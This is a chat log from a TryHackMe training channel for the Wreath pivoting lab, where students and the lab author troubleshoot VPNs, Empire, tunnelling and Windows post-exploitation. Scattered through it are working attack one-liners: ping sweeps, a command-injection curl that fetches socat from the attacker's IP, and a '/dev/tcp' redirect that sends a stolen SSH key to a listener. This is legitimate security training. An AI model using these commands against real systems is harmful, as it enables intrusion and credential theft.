#wreath-network
1 messages · Page 5 of 1
just drop all incoming connections, best av ever
haha
i mean
not false
or find a way to reverse-connect and forkbomb the network
speaking of
does the network have any forkbomb protection lmao
Would you please leave my poor network alone? smh
its fun and im almost done and awesome job
someone should find a way to upload static java files to the dev network so that the 100 ppl can play minecraft together 
thats one way to assert dominance over the network
hijacks network and moves all resources towards minecraft server
thats also one way to get banned
plzdontbanme
aaaaand
woooooooooooo
Ayeeee
All that effort for someone to reset it/ for you to get kicked out after 10 days 
Did you enjoy it?
Also, good luck hosting a minecraft server on those boxes -- they have virtually no resources 
We need to get a Wreath feedback page setup somewhere
Purely for my ego
haha
challenge accepted
No wonder -- you're proxying it through a box that quite literally can't access anything other than .100 and .200
sshuttle is truly amazing
Combination. .200 is a t2 micro, .100 and .200 are t2 smalls
muiri, if you make another network you should make it pivoting hell with a couple of hosts running a bunch of docker instances 
doubt it, considering they're the windows hosts
watch me
go on then, i dare you
me, activating troll behaviour? idk what you're talking about
@merry robin will i get banned if i try
Muiiiiiiir let's make the thing
Probably
Which one?
pivoting hell with a couple of hosts running a bunch of docker instances
We've discussed a few things like that

Take that @jagged lion
fwiw I prefer wreath to holo/throwback
Wreath is a really nice primer for pivoting and windows exploitation
yeeep
Wha
Especially with it being free content, it's really good and pretty well explained.
and definitely something you can speedrun in a day lol
They aren't telling me to go kill myself after doing my network
I mean
hey, they didn't do holo
hey i want to die can i have early holo access please
Holo is really designed to show unique and obscure topics and attacks rather than comb over the basics
True, but the testers are going to murder Cry sooner or later
I think wreath does a good job of going over the basics well
woah
I'm crying. That's the nicest thing you've ever said to me
lmao
I've been rewriting Spooky's bs for the past 4 days
Better quote it before he takes it back 
Funny. He's been saying the same thing about your content
So the testers might not crucify us
Too late
I don't know, all the complaints I've seen have been about his sections so
Got Esqy building a cross as his latest woodworking project in preparation
lmao
Honestly
spooks and I aren't good at explaining basic shit
we're more specialists in a sense
Specialists at what?
lmao
im gonna leave before this turns into a murder scene
same
Cry learned it the hard way from Throwback
Don't worry, spooks and I stab each other at least 30 times a day
rlly
Those two are honestly like an old married couple
I assume it has only gotten worse over time, so only surprise is that they dont stab each other even more
in hindsight, maybe i shouldnt have finished it so fast now i have to wait lol
Hi guys. Any way I can do wreath without a 7 day streak? I just want to practice pivoting to supplement my study. Thanks for suggestions in advance.
not if you dont subscribe
I have the subscription.
You can join using the sub
Roger, Thanks very much both of you guys.
Np
Enjoy the network!
enjoy!!
Thank you again.
Hey, I added <IP> thomaswreath.thm to my hosts file and firefox is giving me a unable to locate error. Any ideas?
I tried clearing my history and cache.
Could you screenshot your hosts file for me?
Nm, I made a mistake when I wrote the IP.
Ah, fair
allo all. hey with wreath, after getting onto the first box i can't reach back to my attacking machine
is this expected? e.g. as root on the webserver I can't ping, or pivot via a reverse proxy etc back to my attack machine
Are you using the AttackBox?
yup
Did you start the VPN manually?
nope. attack box said it wasn't necessary?
Good. What IP are you trying to connect back to?
the one listed on the my machine page for reverse proxys
but even writing that i figure i know what im doing wrong
guessing a vpn interface on the attack box yeah
Yep
my bad, thanks man
@merry robin found more ports on task 5 question 1 than the answer
oh wait one is closed me dumb dumb
Chances are that's someone not bothering to read the task and opening ports below 15000
Unless it was just the one?
I installed Empire today and think they might have changed the location of scripts - from /opt/Empire/data/module_source/situational_source/network/
to
/opt/Empire/data/module_source/situational_awareness/network
(only realised because I copy pasted command initially from guide)
As I said before me dumb dumb
At this point, I'm convinced that the editor is trolling me
oh, you did have that location later in the documentation anyway
That's about the fifth time I've had to fix that
I think it's currently fine I just didn't read everything
True
haha
@merry robin is there any benefit for doing a ICMP for loop with /dev/tcp vs the ping command with -c number of pings?
Ah, I getcha
So:
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done
You're asking why do that instead of using /dev/tcp?
reading the answer blanks no wonder
Hm?
trying to enter the /dev/tcp/ one
I, uh, am thoroughly confused right now
The ping sweep is used as a rudimentary way to see if hosts are up. The /dev/tcp one is used to check if TCP ports are open on a single host
Or within a nested loop, for multiple hosts, if you're a masochist
# this is how I have done it
for i in $(seq 1 255); do ping -c 1 -W 1 10.10.10.$i | grep 'from'; done
So, that'll be a lot slower as it's not backgrounded, but it's a similar principle
Updating the directories again just for you
have you used fping Muriri?
Please don't
even though that's never installed on remote machines... ahahah
Yeah, as part of coursework a while back. Used to form custom packets, right?
you mean hping3
ya
I can't fix one problem without creating a new one for you lol
Hahaha
Great work on the network by the way, really enjoyed playing around on it
Good to hear
Kudos to @merry robin for creating the network. I just finished my labs for the pwk oscp and this network is solid. Great work.
You'll find that all three main teaching sections can be mapped into PWK sections -- Pivoting, Empire, and AV evasion. Albeit taught very differently
about to do the PWK, so this is awesome
@merry robin You don't know but you're god! Started with Wreath, already loving it. So much of learning! 
how do you guys make the pictures on the end look so clean!!! After all the text.
To connect to wreath I've to connect to the wreath network? Not the machines right?
yeah connect to the wreath network then you should be able to nmap the first machine
Thanks
Possible that someone has changed the root password on the initial box as the hash isn't accepted as a flag
Make sure your answer begins with $6$ ends with ad1, you might be copying too much.
Ouch, best bet would be to try and get a reset through. You might be able to report it as well by sending an email to support, not sure if they can/will handle this.
If you're on 10.200.72.x then it's unlikely as like 100 people got thrown into that network
Are the votes done dynamically? Like do you always need half of the network to vote? So in the dev's network case 50... rather than 5?
I think so. Not 100%
Can we share the report publicly ?
same question
50???
Jesus, it can't be over thirty, right?
It was 23 last I checked, on 72
While gunzip chisel windows it says unexpected End of file
And we need to download latest binary? Or the v1.7.3
@young roost yep, by all means :)
The specific format (PDF shared in something like Google Drive) will obviously make it a bit more difficult unless you embed the PDF in a website or something, but go for it! I've already asked for no spoiling the checkpoints in task 44, so try to avoid that though.
That and obviously only the correct format is actually getting into the writeups section
Sounds like you downloaded the HTML page
Latest will be fine π
Thanks
Nope... coz the Linux one got gunzipped
Do file on the download?
Empty
That'll be why it's not gunzipping then. Try downloading it again
Thanks
Oh...now I got the reason the file was not getting downloaded because it states this file contains a virus or malware
Why are you downloading it on your host?
You're running AV... on your Kali?
Probably chrome being a pain tbh
Oh, you're downloading it from the browser, I see
Yes
Thanks anyway for the help
Yeah, try downloading it with wget, or tell the browser to stop being a pain
I'm having trouble downloading the vpn file for the wreath network. I keep getting a 404 error page...
@strange bison what's the fix for that one? Regenerate, wait 10 seconds, download?
Okay. @daring pine click regenerate, wait two minutes, then try
ah, facing the same issue waited for like 10 minutes ;-;
If that doesn't work, let me know
Still kinda stuck on the 404...
@limber rover are you able to check what's happening? Anything to do with that new code?
(Or @fiery ingot seeing as you're online and VPNs are usually yours :) )
ashu goes offline
I'm also stuck on the 404 error after attempting to download the config file...
Yo guys. I make all steps for persistence in starkiller/empire.
Open ports via firewall
unzip files and phps
but i can't get callback git-serv
I tried that as well via cli empire
usemodule .... / shell whoami
execute
no callback although
sshuttle active
evil-winrm works
any suggestions?
@humble sluice looks like they are calling back, but are dying?
For the config file... I had to wait way longer than 5 minutes... That should work.
Yeah -- I think that's the bug in Empire, although I haven't seen the starkiller interface for it when it happens.
The wonderful CX0IN has a fix for it, but it hasn't been pushed to production yet @Embargo#7344
Goddamn android Discord doesn't like mentions
@humble sluice
xD
@dense tundra did you get it working?
@humble sluice nah -- the Empire section is technically optional
Well worth doing though
Hey, can you give me an IP of a machine on the network?
Yes. It's ok now.
The goal was to teach as many different techniques as possible. Empire is awesome, and you could do the whole network with it, but for learning it's good to get as wide a range of experiences as possible imo
Awesome
10.200.104.200
Try regenerating now?
I'm still getting 404's. Does the attackbox work against the wreath network?
You don't need to download the VPN config to the attackbox
It connects automatically
I tried pinging the ip on the attackbox, but I'm not getting a response
Maybe I did something wrong, I'll try again tomorrow bc I already terminated the attackbox and I can't start it again until tomorrow
It doesn't connect automatically for non-subs
oh, is there an extra step then or I just can't?
Ah ok
Huh, ok
if im using socat in task 21, would it be a fork or a relay i should use?
@lusty glade why use socat in task 21?
My pip is pointing to python3.8 so whenever I command python2 -m pip install it says no module named pip
sorry task 20 i mean
@surreal sail ah, have a look at the get-pip.py script. Just search for that online, download the script, then run it with python2
Okay
@lusty glade which do you think it might be?
It needs 3.6 or above version
@surreal sail change the shebang to use python3 and go through adding brackets around all the print statements
As in, if it was print "Exploit" make it print("Exploit")
That's literally all you have to do to convert that one
Yes I know thanks btw
relay i'd guessing but can't get the syntax correct
trying to follow how it was done in the socat section in task 13
then sending my reverse shell through burp but i dont get a connection
That'd do it
do i need to do the ncat step as well or just having the socat relay running?
Yes, you need to have a listener running locally
lmfaoooooooooooooooooo ok i got it now thanks
Awesome
I am not able to scan my network any idea what might be the problem. I regenerated my .ovpn as well but same problem.
@haughty sun what exactly are you trying to do? :)
I am at the enumeration stage trying to scan the machine.
Which machine?
Wreath Network I mean
There are three machines on the Wreath network.
Which stage are you at?
Web server one
The ip is 10.200.100.200. the thing is when I ping it takes some time to respond
Are you using the AttackBox?
No
Could you show me the output of ip a?
One minute please
still getting the 404
Same... I can't get hold of the proper config file... Took me a while to realise it downloaded the normal one...
It's still a problem for you both?
yep. I waited for around half an hour now after pressing regenerate
again 404
Hm
@limber rover I reckon the 503s might be more of a problem, but just if you get a chance to look at it, the network config download is still borked by the looks of it. Not sure what you did earlier to get it working for YeaHacked
CF enabled, hopefully in the next few weeks we'll have migrated our infra which will stop those from occurring
got redirected to some cloudfare and then back to 404 ;-;
503*
What VPN server is this? For Wreath?
Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)
10.200.104.200
i got a problem
when i am going to download the ovpn file for the wreath network i get redirected to 404
Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)
let me look into this one - it looks like this is the same server from earlier that was having issues.
oka
Please try regenerating your config now.
10.200.104.200
Ah you're both on the new OpenVPN server - I think the issue is fixed, so please try regenerating.
Did you regenerate, or just click download?
i regenerated already
Did you try regenerating in the last few minutes?
just regenerated now and still not working
Okay, will investigate:)
yes
still doesn't work
at first i thought my internet is not working properly
Ah - thats weird. Something isn't right with that network.
@surreal sail & @fiery bay please try regenerating your config again:)
We've found the error and have fixed the problem.
The patch should be on the kali repo as of this morning. Just make sure everyone is on 3.8.1
Oh you beauty. Thank you!
Is it available in the main Empire repo?
The main repo isn't updated yet, still working out the merge conflicts for going back and fixing 3.7
Faiiir. The latest version of Empire I'm seeing in the repo is also 3.8.0 by the way
Did you run a git update? But it could also take a bit for the repo to pull down the published version on their gitlab.
Not a git update no -- I did an apt update then upgraded the powershell-empire package.
I'll give it a go in a couple of hours and see if they've synced it
Lol need more coffee... Meant apt update
Haha -- don't worry, been there
I'm still getting the problem!
Please give me an IP of a machine on the network you're on (shown on the network visual map in the room)
10.200.104.200
Ah that one has been fixed, did you try regenerating your config?
Still 404
Did anyone face any problem while installing Empire? Module M2Crypto was not getting installed in my case
I have no idea what the 4 dots after the first one are unless it's all the -rNx options but that didn't work either task 15 question 2
Whats your THM username?
@strange bison oh though you wanted to include the sshuttle part with the -e flag
right...
thanks
I did say just the switch and arguments for it
fair enough
just the switch and arguments with short form wouldn't fit
Can i get some help?
banned?
yeah
i just logged in in a while and saw that wreath has launched
and this appears when i clicked
@strange bison anyways thanks for the help like it so far. Will finish it today
not like room timeout errors just banned? I have no idea
yes just banned
@merry robin another banned user
Did you try to join before it was released?
i think so..
oh
One of the admins was banning people from the site for it so you were lucky
oh ohmy
so can i be unbanned or i ll stay like this?
I pinged Muir. Muir will sort it.
oh ok
TurtleBerry
There isn't an account with that username, are you sure its correct (and the case is right)?
Are you installing it through kali with apt install powershell-empire or github?
Github
Should be okay now:)
That package can sometimes cause some trouble. I'd give the kali install a shot. Especially since they are getting early access to a newer version with a few more features. If you are still running into install problems, you can always reach out to us on our discord.
https://discord.com/invite/P8PZPyf
Thanks will give that a try tomorrow morning
I panic when I see a discord link NGL
Hehe, that one is fine
Thank you, I will give it a try in a bit!
sorry lol I tried not to link it with the embedded thing but it cannot be turned off apparently
Cx01N, it's really great that you're working so closely with Muir on this. As someone who tested the network and was there for some of the dev, it's been a challenge but it's good to see bugs in the tool ironed out like this
Big thank you from me, and I'm sure the rest of the testers would back that
@strange bison Thanks! I know I hate it when tools dont work so we try hard to get those fixed pretty quickly
Hey, so i am getting a strange error on post exploitation on 2nd machine. i added my user to admins but i cant get mimikatz to work || it gives me a perm error and token elevate doesnt seem to be working either, it shows token (Error : ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 )||
Are you using WinRM or RDP?
command prompt needs to be ran as admin too
rdp
ohhh okay but i thought we had to privilege debug and then token elevate
Then what blackdragon said, I would imagine
yess
You also have to do that
WHen does this get released?
ahh okay, Thanks a lot to you all for the help
It's to do with process integrity. An administrator doesn't necessarily execute processes as an administrator. Usually they do it with medium integrity -- same as a normal user
You need to execute command prompt explicitly as an administrator (as a high integrity process) before you have the Impersonate and Debug tokens available
As in, hard-released?
ahh okay, thanks a lot, I didnt know that
is there any other port I need to forward for evil-winrm to work? Trying to forward it and do localhost -p <port-number> fails and evil-winrm over proxychains dynamic ssh tunnel fails, confused
Are you using an SSH port forward through .200?
@merry robin I can get rdesktop to work fine
that's about it
shuttle and dynamic ssh forward over proxychains works
have tried firewall rules and local forward winrm to localhost on a different port just times out
What have you used to pivot @lilac ibex?
Are you setting up an SSH port forward to 5985 via .200?
||ssh -D proxyport -i id_rsa root@10.200.92.200 proxychains evil-winrm -u user -p password -i 10.200.92.150||
oh that didn't format right
and || ssh -L 1234:10.200.92.150:5985 -i id_rsa root@10.200.92.200 ||
That would indicate that the user isn't in the "Remote Management Users" group
OR that you're getting the password wrong
But yeah, the actual proxying is working fine
if there are not in remote management
wouldn't RDP fail as well?
or does that not apply
RDP accepts Administrator or Remote Desktop Users groups
So either of those will have access
There's something funky about WinRM and administrator
From memory it's that you can only use it as an administrator if you've already logged in once normally / via RDP
Something like that
Otherwise you need the Remote Management Users group explicitly defined
command failed while trying to do web command injection... no wonder
lkadjfdak;lsfjads;klf
@merry robin thanks
will write that down
Np!
Somebody else get a permission denied when trying to connect with root ssh to the network?
@outer thunder what's the command
sometimes I have to restart my ovpn connection for some reason
even though the network is still up
no idea why
|| ssh -i id_rsa root@<ip> ||
and chmod the key
Is this channel new? I just noticed it
Yes changed with 600
@outer thunder
- the network died and f5 the page will see it's off
or - restarting your ovpn connection will fix the issue for some reason
- i have no idea after that
@sly spear ya free thm network is out
Which network are you on?
@lilac ibex thanks i will try it with my open vpn
And can you screenshot the error?
Sweet! Thanks 
np just need a 7 day streak or sub to do it
@outer thunder any luck while I wait for this to download...[progress-bar...]
@merry robin this is my error message
ssh -i id_rsa root@10.200.95.200
Load key "id_rsa": invalid format
root@10.200.95.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
id_rsa key is broken
That looks suspiciously like someone might have changed the key
or that
Could you do me a favour: disconnect from the VPN and DM me your connection pack @outer thunder?
The authorized_keys file is literally chattr +i'd to discourage people from doing that, but, some people are trolls
@merry robin if the file exist with the correct key. Does chattr prevent ssh-key from working?
Nah -- works fine through it
Just stops people from overwriting it, and chattr is less well known than chmod
ya chattr doesn't allow anyone to modify it including root. Just wondered if I missed something important
"if you change the key I will hunt you down" - problem solved
Tbf, I am quite happy to ban people if I see them trolling
It's a free network -- not like they're paying to be in there
Ergo it's a privilege, not a right
@merry robin anyways has anyone tried to do a shell over rdp with pth-winexe doesn't seem like it works
IIRC that's working via SMB?
SMB isn't exposed on either of those boxes, so it shouldn't do
pth-winexe needs 445 to work?
not trying psexec
Yep, but it has to get in somehow
I think this is in my PWK notes. Lemme check
Oh, wait
Samba
So yes, it's working via SMB
As far as I can tell, winexe is actually basically the psexec build for Linux
The impacket psexec.py just being an alternative
ah then why is it always talked about as RDP...
I've never heard of that tool hmmmm, probably because the latest system it supports is 2003
Oh, no idea, but it's definitely nothing to do with RDP. There are ways to PTH with RDP (xfreerdp has an option for it), but winexe doesn't take advantage of that
@hard mortar can you confirm that?
pth-winexe hangs to
grrr
It does Windows NT as well
heck you no ask me
seems like they are the same thing
yes you can pth from rdp
or im doing it wrong
Because you just told me you'd never heard of it!
winexe != pth
pth-winexe won't work either if SMB isn't open
There's a tool called winexe, and there's a tool called pth-winexe
smb not open sage
Two separate binaries, and yes, it's weird
Yeah, they're doing the same thing, just one of them does it with PTH and one of them is just an equivalent to PSexec
pth via rdp doesn't work in like 99% of situations for whatever reason
Why those couldn't go into one binary, I don't know
Some obscure registry setting
yup
pth-winexe is super slow vs psexec
But no, it was the winexe working over SMB that I was asking you to confirm
That's correct, yes?
seems like it
Oi, Spooky π
Right, that's literally what I sent a minute ago

Thanks Spooky ♥
kek, but is there any shell rdp only port program I have never heard about?
im no expert tho
Right, you literally are the Windows expert around here
But yeah, that was my conclusion too
I am?
Oh God
RDP is graphical by nature
So, I wouldn't imagine so
but shell so copy paste is more fun
That's where WinRM comes in
what is smb and winrm are both closed?
if SMB is closed, your PC is borked.
Then you hope that RDP is open
Tbf, it's firewalled in both of those Windows machines -- just by default
remember, filtered vs closed is different
Surely if you have all the sharing off then SMB is closed?
Although it shouldn't technically be. Just because Windows doesn't classify AWS networks properly
By that definition wreath is broken
Think it's still actually open, iirc
Wreath is less broken than holo™
Just nothing being shared
surprisingly, no, you need to go disable several services
@strange bison can I access that right now?
D:
And think yourself lucky for it
Holo is a wee bit brokey
netlogon, lanmanclient, and lanmanserver
To answer this question though, if you don't have SMB (with admin credentials), or WinRM (with a user allowed to access it), or RDP, then you're hoping that there's a vulnerable service / webapp
Otherwise you ain't getting in
D:
Kinda the equivalent of SSH being closed on Linux
fair but still D:
Hey, be glad I specifically allowed WinRM in the firewall 
when port 80 is the only port open
Then the fun begins
is there a good way to do reverse socks proxy with dynamic ssh tunnels windows machine -> first box?
trying chisel thinking how to do it with ssh
not sure how to do the last pivot will figure it out later
Sounds like a cache thing there
In task 17 it is mentioned that we cannot perform a service scan on the target without setting up a proxy, is that because we use a portable version of nmap or what?
Yea, it doesn't have the service version scan supported. I think it explains why if you try with the static nmap?
Yes, it says that couldn't find the nse_main script
Yeah -- static nmap doesn't include all the Lua scripts that make up the NSE
How long should it take this to run? || sshuttle -r root@10.200.1.200 --ssh-cmd "ssh -i id_rsa" 10.200.1.0/24 -x 10.200.1.200 ||
keeps timing out
Virtually instant, but I can almost guarantee that's the wrong subnet
10.200.1.x is not assigned afaik
Oh wait -- maybe not .2 I think and a few subnets above are throwback (honest it's so easy to mix up when using the CLI LMAO)
Yeah, Holo and Throwback are on 10.200 as well, I know that
but yeah -- 10.200.1.* defo isn't assigned for anything like that atm (:
glad you know more than me Muirl
c : Connected to server.
Although Wreath with 40 networks will be taking up a nice big chunk of the upper section now
proxies confuse me but I'm figuring it out. First network haha
just follows muiri's instructions they are really clear
You'll get this!
Let me know if there's anything I can make clearer in the network
Yeah it was mainly with the foxy proxy, thought I was supposed to set the ip to the device I was connecting to .150 instead of .200 so I kept trying to navigate there and got redirected to my dns setup earlier. Everything has been very clear, thanks!!
It happens!
@merry robin @fair breach can one of you check the 72 network, it stopped and after restarting I can't get connected
Lemme check real quick
Aye yeah everything is stopped aside from the VPN for it @woven warren. Boxes launched 3 hours ago (20.16:12 GMT) but shutdown 16 mins ago (23:50:00 GMT)
That network is really packed, more networks have been created - if you leave and rejoin the room you should be put into another less-busy network.
thanks
Thanks @limber rover (:
up on the 99 network, now to re-exploit
Glad to hear it. Hopefully it isn't too much of a pain
We're still trying to see how best to scale it etc hence why it isn't "officially" released etc
Never know until you try right? No matter the testing
Thanks for including shebangs, that's pretty cool.
I have some pretty good notes, that is making it quick, plus some of the stuff is the same
Wicked to hear. Teething problems since networks is such a new thing to THM
I am enjoying it so far
From working on it on the backend as much as I have it seems great. Muirl's done an absolute superb job. I just haven't had the chance to fully go through it (as in complete the network)
but I think it really teaches some important concepts/topics super well
yup, up to task 40
Set the IP to the correct target for your choice of pivoting technique. If you used sshuttle or one of the proxying techniques then this will just be the IP of the target.
Is the target the one my proxy connection the server is setup with or the target I am attacking with the exploit
Task 19
target is the host you want to exploit
sshuttle just helps facilitate the connection
I see, it makes sense now.
this intended??
That is not a static binary
Where did you get it from?
my host
Then that'll be why
haha ok.
When a binary is compiled it's usually dynamic (meaning it relies on other libraries of shared code on the system)
You have to outright tell the compiler to create a static binary if you want it to function entirely independently
gotcha....well i figured my nc binary would work...thats not either
For the same reason
Use the links in the task to download static copies
RTFM == win always
Heh, they're definitely not just there to look pretty
@merry robin can i know if i can be unbanned from Wreath please?
Is the target up? I was able to reach it yesterday, but can't right now. I've verified that I have a valid tun0 IP - but the target isn't pingable/nmapable today for some reason
10.200.72.x?
Are you not the guy who did about 30 questions in it before I banned you?
nope
You sure?
Nothing for 10.200.72.200
My streak dropped to 0 today as I couldn't get the pivoting working yesterday, not sure if that's related? I'm a subscriber though
Because I distinctly remember giving someone the link, thinking they had joined, being pleased that they were working on it, then checking the profile and realising it wasn't a British account, but rather, a Romanian account with four letters starting with V @coarse zealot
Not ring any bells?
umm
Once you have access, you have access permanently
Are you on the .72 subnet?
If so, leave and rejoin.
leave the room and rejoin, I was having issues with that network earlier
i didn't do many questions as i remember
That's the dev subnet
1 or 2
My tun0 is 10.50.x.x
Essentially a bunch of people got shoved into it by accident
Is the first IP 10.200.72.200?
Hey anybody knows how to fix this , empire when using the hopping listener
so no chance of unbanning ? :((
$ ping 10.200.72.200
PING 10.200.72.200 (10.200.72.200) 56(84) bytes of data.
From 10.50.73.1 icmp_seq=1 Destination Host Unreachable
My tun0: 10.50.73.x/24
I mean, it sounds distinctly like you're
A) Lying to try getting unbanned and
B) Not acknowledging the infraction in the first place
Leave and rejoin
i don't remember, but thanks anyways
*sigh*
I've asked the admins to unban everyone, full disclosure
It's obviously not been done yet though
You have left the room.
Should I download a new ovpn file too?
Yeah, rejoin then download a new config file
That... Good question
Um, @fervent obsidian?
Weird Python error message
Thanks; I just rejoined with tun0 being 10.50.101.x/24 now
Looks like PING 10.200.72.200 (10.200.72.200) 56(84) bytes of data. just hangs indefinitely now unfortunately
you should have gotten a new network
You're on a different subnet now
I thought there might have been a more explicit 'rejoin' for the room, but it just kept my old state around for some reason
10.200.100.x, I'd wager
i got .99
Nothing active on 10.200.72.* even then there's only one machine which is the .200 which doesn't seem to be the vpn server
which was stopped ~2/3 hours ago
Oh I lie
.250 is the VPN server
the VPN server for that is active but nothing else
I'm not seeing any transfer from my http server. Anyone know what I'm doing wrong? || curl -X POST http://10.200.72.150/web/exploit-Ferrari404.php -d "a=curl http://Tun0-IP/socat -o socat-Ferrari404 && chmod +x socat-Ferrari404" ||
which task is that for
Task 20
trying to setup the relay but not sure how to get socat onto the target
I went back to Task 13 on socat to try and figure it out
but no luck
if you use the SSHuttle that the guide recommends, you should be able to just use "upload" and "download" functionality with WinRM
anyone having issues with level 33 on wreath?? i have issues with the webpage displaying
Ah right, I did use sshuttle.. thank you.
@glacial monolith level 33?? i used shuttle too
No, I'm on 20
Thanks guys...learning that xfreerdp can map shares was worth the admission alone. Super fun and very real world materials...
Please can you tell me how you get this? I finished the room but I didn't get this, only the badge
You can download a certificate for a badge
For any badge.
From where, please, if you can help me
I'm not exactly sure how to do it but I know you can
I'm sure somebody else will be happy to help
Actually here, on your public profile
Click "Share badge"
@native needle
No worries
Can I still access the Wreath network after finishing every question? Still would like to play with it.
Mhm
Wasn't sure if networks were completely different from normal machines. Even if I answer everything I can still access it, right? Should probably stop staying up so late...
You can, yeah
Keep in mind the "limited users at once" thing, but there's nothing wrong with having a play around with it for a bit afterwards
@merry robin thanks, also did you ever get no ports found from the invoke-portscan command? Figured I would learn chisel in a chisel but it's slow as dirt
Huh. Nope, can't say I did. How strange.
returned ports with {}
Guys is crackmapexec detectable by anti-virus?????
Does anyone else keep periodically disconnecting from the wreath network? Seems to happen to me about every 5-10 mins :/
@half ledge like when you check your connection and the completed part is missing every 5-10 mins, sometimes lasts longer than that
About to go for a shower, but sure
Well for some more context, I'm on the pivoting section of the room. But whenever I tried getting a shell during the exploitation section it randomly kept dropping the connection every now and then
@half ledge like you get a shell and 2 seconds later something breaks
Yeah sort of, it went fine for about a command or 4 and then it just freezes up the terminal as well iirc
After which I check the terminal running the ovpn connection where it starts reconnecting, still not sure whether this is a me-problem or something with the room, I'm starting to lean towards the me-problem tho :p
at that point I just force ctrl-c and restart ovpn real quick
waiting around seems like it takes longer but it drops every now and again
not sure why, but it seems like Muiri is in the shower so we will never know
Just remembered, this also happens when I ssh into the public box ||(as root after getting the ssh key)||
other than it randomly crashing it seems like if the network doesn't sense anything even though it has time it will just turn itself off
can't tell if the network just ran out of time or there wasn't enough traffic to keep it going
@half ledge are you using the AttackBox?
Nope, my own kali VM, which is why I think this could as well be an issue on my end
Yeah, it sounds like a multiple VPN thing
Yeah I turned off my own (non-thm) VPN after a while as well, didn't change much sadly
I'm not really around to debug just now though I'm afraid. About to head into a meeting
Oh don't worry about it, I'm working as well, just figured I might as well get a head start on this for after work :p
windows defender is picking up some of my obsidian files as suspicious because of the notes i took/copy pasted commands? lol
Doesn't surprise me π
woohoo it is finished!
I'll try do a nice report and submit it as I want the practice, awesome room @Muiri I learned something new in every section, often multiple new things and I think cleared a lot of fog for me around AV Evasion and Exfiltration (impacket smbserver quite nice!)
thanks for putting that together
Hello all, I am still unable to download a new configuration file?
Any help would be great
I have redone a new configuration file and it is now working!
What's up?
Can I PM @merry robin
Does it need a DM?
I am having issues with the git webpage
Not sure what I'm doing wrongly
I will send screenshot
Looks good
foxy proxy
Yep
still can't access the main git page or the resource page for auth
/resources
jeez i just got it thanks bro. so stupid of me
Hi guys.... I'm doing the wreath network... ran the exploit, everything going nicely until I set up the shell, putting the IP, port, then setting up the netcat listener in another window (nc -lvnp ....) no matter what port I choose, nothing happens.... I've tried at least 10 different ports. I'm typing the IP that TryHackMe gave me after connecting to the VPN network... also, I'm using my own distro, not the website attack box. What am I doing wrong? Could it be my internet connection that is crappy?
at the end and says the NT hash is wrong...
DM me the hash?
What OS are you using?
tried it with samdump2 kinda sucks
Pretty sure samdump2 is one of the ones that doesn't work on Windows 8/10
DM me the hash?
did it with impacket-script and it worked
Parrot
samdump2 not anything after 8 got it
There's a reason I've recommended the tools I did
Well done getting it now!
I have no idea if there's a firewall running on Parrot by default. What IP are you using to connect back?
I just like figuring out how to do it in X ways so I can compare etc
Oh, 100%
There are others that still work IIRC
Gimme a sec, I have a few in my notes
?
The IP that TryHackMe gave me when I connected to the network VPN
It's so frustrating because everything was going so well
creddump7
That's the one that works.
It's written in Python2 so is a bit iffy, but I believe Tib3rius has a fork that's been upgraded
A 10.50 one, to confirm?
10.4.31.....
Ah, so that's the wrong VPN. That accesses the normal THM machines, but you need a special one for networks
You can download that from the access page as well, under the networks tab
Hello,
I am trying to download the key in Task 7
however the victims PC does not have nc or python installed to download from the victim onto the attackers machine?
Any advice?
Wait, how on earth did you manage to exploit it without that connected?
Do you have two of them running?
But I connected with the one with my name-wreath.ovpn
That'll be a yes. Can you show me the results of ip a?
It does have python installed, although not netcat. There are a bunch of ways you could do it (including things like a Python webserver or literally copying and pasting).
The one I would go to on Linux is this:
Set up a listener on your attacking machine:
nc -lvnp 443 > id_rsa
Then on the victim:
cat id_rsa > /dev/tcp/YOUR_VPN_IP/443
Raw TCP sockets ftw
Np
So, send the shell back to 10.50.107.8
You've got both of your VPN packs running at once, which works fine, but you need the 10.50 one for networks π
Thank you SO much. I'll try that and update you in a bit
Go for it!
Thank you for that, I have downloaded the id_rsa onto my system,
However the file is 0 bytes, both on the victims PC and mine?
it went through!!!!!! sh:cannot set terminal process group (1930) inappropriate ioctl for device sh:no job control in this shell
But Iβve got a prompt with sh-4.4#
Sorry to be such a n00b
done in two days @merry robin, well done, really enjoyed that one!!!!!
@high totem you have a question?
Uh, that's less good
What do you mean?
Well done!
Could you do me a favour:
Disconnect from your VPN and send me the connection pack?
Sounds like someone might be being a prat with the key
Thought that was the case
I will disconnect and send the connection pack now
Would you like it sent DM?
Yes please
Hey! Can anyone tell for how long this machine is gonna be free?
Forever
turbotax: free for free forever
Umm! Coooll! But why is it asking to have a 7 days streak for joining this room?
Cost, quite simply. It means people have to actually put some thought into it before clicking join. Every person in the room takes up a space on an instance which costs a tonne of cash to run. Having a streak requirement means that people will hopefully be discouraged from just joining and not actually using it.
Hey @merry robin can I dm about wreath network
What's up with it?
Someone added few files to /var/www/html dir
Can I remove those
And changed index .html too
*sigh*
Yeah, drop me a DM with some screenshots would you?
Sure
woooooooo its officially released
Hey, when I tried to Task20 / reverse shell with powershell I cannot find a way to get it
I set up a socat relay with the correct ports etc but nope
After some time I decided to ||upload an nc binary|| to the compromised linux host and try to listen here and the powershell failed once again.
Then I decided to skip this step and do the next one to get a stable shell on the 1st windows box.
But when I tried to execute the powershell reverse shell again from inside the windows host it errored out.
(This is the payload from task20)
I'm just curious why it isn't working.
Thanks for any kind of information
It's erroring out in WinRM because powershell is weird about executing powershell as a sub process. I suspect it would do better if some stuff was escaped
Is the firewall open on .200?
I thought it was but I ran it again and it works
i was a bit reee
thanks for the quick help π
Np
I live here just now
it is not free
What makes you think that? @dense lotus
when I want join room "You need a 7 day streak to join this room. Subscribed users can access the room instantly!"
Exactly:)
You need a 7 day streak, or premium users can join without a streak.
You obtain a streak by answering at least one question per day.
You can view your current streak from the top right of your page.
its still free, just you need a streak
if you sub, then you dont have to
but its not obligatory
A streak being you need to be active and answer questions on the platform for at least 7 days (in the case of Wreath)
freaking loving it Muiri!
that's the line I fixed in 3.8.1 so hopefully the new version fixes it.
Phew. Thanks!
I may have found some slight grammar bugs, if you want me to post? not important at all
Please do
(e.g. has some random code that does the grand some of nothing inserted into the exploit)
oh, no that was the excerpt from the room
lol, it's just I think "sum" not "some" in this instance
Which task / paragraph?
just checking, i added it to my notes but didn't write where I copied it from hah
Task 38
